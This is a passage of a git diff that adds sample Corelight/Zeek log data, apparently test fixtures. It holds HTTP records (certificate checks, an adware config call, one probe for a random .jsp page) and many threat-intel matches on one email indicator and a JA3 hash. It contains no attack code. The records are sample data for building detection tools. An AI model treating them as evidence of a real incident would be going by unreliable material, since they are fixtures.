9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.071442Z","uid":"CYmMV1vb53b2jV07l","id.orig_h":"192.168.0.51","id.orig_p":37324,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":3,"method":"POST","host":"ocsp.digicert.com","uri":"/","user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","request_body_len":83,"response_body_len":0,"tags":[],"orig_fuids":["F8en7l1LV2IPx6fLCi"],"orig_mime_types":["application/ocsp-request"]} +{"ts":"2018-08-03T23:39:01.071442Z","uid":"CYmMV1vb53b2jV07l","id.orig_h":"192.168.0.51","id.orig_p":37324,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":1,"method":"POST","host":"ocsp.digicert.com","uri":"/","user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","request_body_len":83,"response_body_len":0,"tags":[],"orig_fuids":["FruyQsIM31LEyQ5mj"],"orig_mime_types":["application/ocsp-request"]} +{"ts":"2018-08-03T23:39:01.071442Z","uid":"CYmMV1vb53b2jV07l","id.orig_h":"192.168.0.51","id.orig_p":37324,"id.resp_h":"93.184.220.29","id.resp_p":80,"trans_depth":2,"method":"POST","host":"ocsp.digicert.com","uri":"/","user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","request_body_len":83,"response_body_len":0,"tags":[],"orig_fuids":["F7v4Ep1MMC13a4yDD6"],"orig_mime_types":["application/ocsp-request"]} +{"ts":"2018-08-03T23:39:00.945553Z","uid":"CXgUSFFDSVzOfZ8x9","id.orig_h":"192.168.0.54","id.orig_p":52640,"id.resp_h":"23.78.127.162","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.001217Z","uid":"Cvh6wj4VimbGAfsIq2","id.orig_h":"192.168.0.54","id.orig_p":52794,"id.resp_h":"23.78.127.162","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.microsoft.com","uri":"/pkiops/crl/MicSecSerCA2011_2011-10-18.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.079083Z","uid":"Cae8jj44kIVwU95K9","id.orig_h":"61.160.195.10","id.orig_p":1285,"id.resp_h":"192.168.0.2","id.resp_p":80,"trans_depth":1,"method":"GET","host":"95.192.215.175","uri":"/8nzr701m3s.jsp","user_agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.006067Z","uid":"C5qsU43WVspFbFHtkf","id.orig_h":"192.168.0.54","id.orig_p":52795,"id.resp_h":"80.239.237.10","id.resp_p":80,"trans_depth":1,"method":"GET","host":"crl.microsoft.com","uri":"/pki/crl/products/tspca.crl","user_agent":"Microsoft-CryptoAPI/6.1","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.056647Z","uid":"Cm7HKR3RQ9cPxV5X0h","id.orig_h":"192.168.0.54","id.orig_p":52923,"id.resp_h":"198.199.14.15","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.wajam.com","uri":"/webenhancer/config?v=d1.4.1.5\u0026os_mj=6\u0026os_mn=1\u0026os_bitness=64\u0026mid=f06847d131a21bb534bd07962f92bd3e\u0026uid=942E7E7368DAADD6C1330C564D1D3954\u0026aid=9860\u0026aid2=none\u0026ts=1426247458\u0026ts2=","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:38:21.709801Z","uid":"CuKJtW3Y0V28ohg7il","id.orig_h":"192.168.0.53","id.orig_p":3504,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANIPConnection","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} +{"ts":"2018-08-03T23:39:01.022738Z","uid":"CdAux82PdcPXUx7NX4","id.orig_h":"192.168.0.53","id.orig_p":3424,"id.resp_h":"192.168.0.1","id.resp_p":8080,"trans_depth":1,"method":"SUBSCRIBE","host":"192.168.0.1","uri":"/WANCommonInterfaceConfig","user_agent":"Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)","request_body_len":0,"response_body_len":0,"tags":[]} diff --git a/Sample Data/Custom/Corelight/intel_20180803_16:37:37-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/intel_20180803_16:37:37-16:40:00-0700.log_ new file mode 100644 index 0000000000..afcd741999 --- /dev/null +++ b/Sample Data/Custom/Corelight/intel_20180803_16:37:37-16:40:00-0700.log_ @@ -0,0 +1,85 @@ +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"ClQLJSY46P9GMuHL3","id.orig_h":"192.168.0.51","id.orig_p":35760,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"ClQLJSY46P9GMuHL3","id.orig_h":"192.168.0.51","id.orig_p":35760,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.379064Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.379064Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.379064Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.379064Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.379064Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.379064Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.398133Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.398133Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.398133Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.398133Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.398133Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.398133Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.475830Z","uid":"C0cOW02ED11m69qvIh","id.orig_h":"192.168.0.51","id.orig_p":36547,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.475830Z","uid":"C0cOW02ED11m69qvIh","id.orig_h":"192.168.0.51","id.orig_p":36547,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.489838Z","uid":"Ckl1SE2EBxVhiqnk5","id.orig_h":"192.168.0.53","id.orig_p":1424,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:47.489838Z","uid":"Ckl1SE2EBxVhiqnk5","id.orig_h":"192.168.0.53","id.orig_p":1424,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:54.536993Z","uid":"CJ8fcJ3TTYdCKaqZkd","id.orig_h":"192.168.0.51","id.orig_p":39623,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:54.556200Z","uid":"C7dt3I3EPGcL9Dfob3","id.orig_h":"192.168.0.53","id.orig_p":2153,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:37:54.556200Z","uid":"C7dt3I3EPGcL9Dfob3","id.orig_h":"192.168.0.53","id.orig_p":2153,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:00.223977Z","uid":"C37Efi3Of1LDYZoGpd","id.orig_h":"192.168.0.54","id.orig_p":53791,"id.resp_h":"184.72.227.197","id.resp_p":1547,"seen.indicator":"abdbdaa1b02f6e30b13c01f9f6742738","seen.indicator_type":"Intel::JA3","seen.where":"SSL::IN_JA3","matched":["Intel::JA3"],"sources":["Corelight_Test"]} +{"ts":"2018-08-03T23:38:00.224911Z","uid":"CdUB5A4Thn1jj0ZTv4","id.orig_h":"192.168.0.54","id.orig_p":53792,"id.resp_h":"184.72.227.197","id.resp_p":990,"seen.indicator":"abdbdaa1b02f6e30b13c01f9f6742738","seen.indicator_type":"Intel::JA3","seen.where":"SSL::IN_JA3","matched":["Intel::JA3"],"sources":["Corelight_Test"]} +{"ts":"2018-08-03T23:38:00.228322Z","uid":"Ce549ISIV6aUve5m6","id.orig_h":"192.168.0.54","id.orig_p":53793,"id.resp_h":"184.72.227.197","id.resp_p":1563,"seen.indicator":"abdbdaa1b02f6e30b13c01f9f6742738","seen.indicator_type":"Intel::JA3","seen.where":"SSL::IN_JA3","matched":["Intel::JA3"],"sources":["Corelight_Test"]} +{"ts":"2018-08-03T23:38:00.231638Z","uid":"CD2hSw7iezg1AwQWb","id.orig_h":"192.168.0.54","id.orig_p":53788,"id.resp_h":"184.72.227.197","id.resp_p":990,"seen.indicator":"abdbdaa1b02f6e30b13c01f9f6742738","seen.indicator_type":"Intel::JA3","seen.where":"SSL::IN_JA3","matched":["Intel::JA3"],"sources":["Corelight_Test"]} +{"ts":"2018-08-03T23:38:01.564619Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:01.564619Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:01.564619Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:01.564619Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:01.564619Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:01.564619Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.528550Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.528550Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.528550Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.528550Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.543642Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.553794Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} 